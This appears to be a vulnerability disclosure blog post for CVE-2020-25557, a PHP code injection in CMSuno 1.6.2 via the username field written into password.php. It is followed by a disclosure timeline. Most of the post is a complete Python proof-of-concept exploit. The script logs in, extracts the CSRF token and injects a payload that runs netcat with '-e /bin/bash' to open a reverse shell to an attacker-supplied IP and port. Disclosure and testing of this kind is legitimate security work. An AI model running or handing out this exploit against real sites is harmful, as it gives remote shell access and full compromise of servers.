Vendor: https://github.com/boiteasite/cmsuno/
Version: 1.6.2Vulnerability: Code Injection
CVE: CVE-2020-25557
Exploit-DB: https://www.exploit-db.com/exploits/49031
Analysis
If you read my other blog post about CMSuno, this vulnerability will be familiar to you because the problem is the same. So I will not go into much detail in this article. The problem here is when you change your username and password your username and password will go to the password.php file without any filtering like below.
This is the content of the password.php file.
While you are changing your password you can inject PHP code into the $user parameter. After that, when you log in to the application your malicious PHP code will be run.
Exploit
I wrote the PoC for this vulnerability. You can use my PoC code below to test your version is vulnerable or not. Don’t forget the get backup of your password.php file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import requests
from bs4 import BeautifulSoup
import lxml
import json
from time import sleep
username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")
login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"
session = requests.Session()
request = session.get(login_url)
# Get the unox value
soup = BeautifulSoup(request.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']
# Login
body = {"unox":unox,"user":username,"pass":password}
session.post(login_url, data=body)
# Get the second unox value
request = session.get(login_url)
text = request.text
soup = BeautifulSoup(text,"lxml")
script = soup.findAll('script')[1].string
data = script.split("Unox='")[1]
unox = data.split("',")[0]
# Exploit
header = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
"Accept":"*/",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"Origin": login_url,
"Referer": login_url
}
payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload)
session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
# Login to trigger password.php
# Get the unox value
session1 = requests.Session()
request1 = session1.get(login_url)
soup = BeautifulSoup(request1.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']
# Login
sleep(3)
body = {"unox":unox,"user":username,"pass":password}
session1.post(login_url, data=body)
Disclosure Timeline
12 September 2020 - First Contact
29 September 2020 - Released CMSUno Version 1.6.3
30 September 2020 - Responsible Disclosure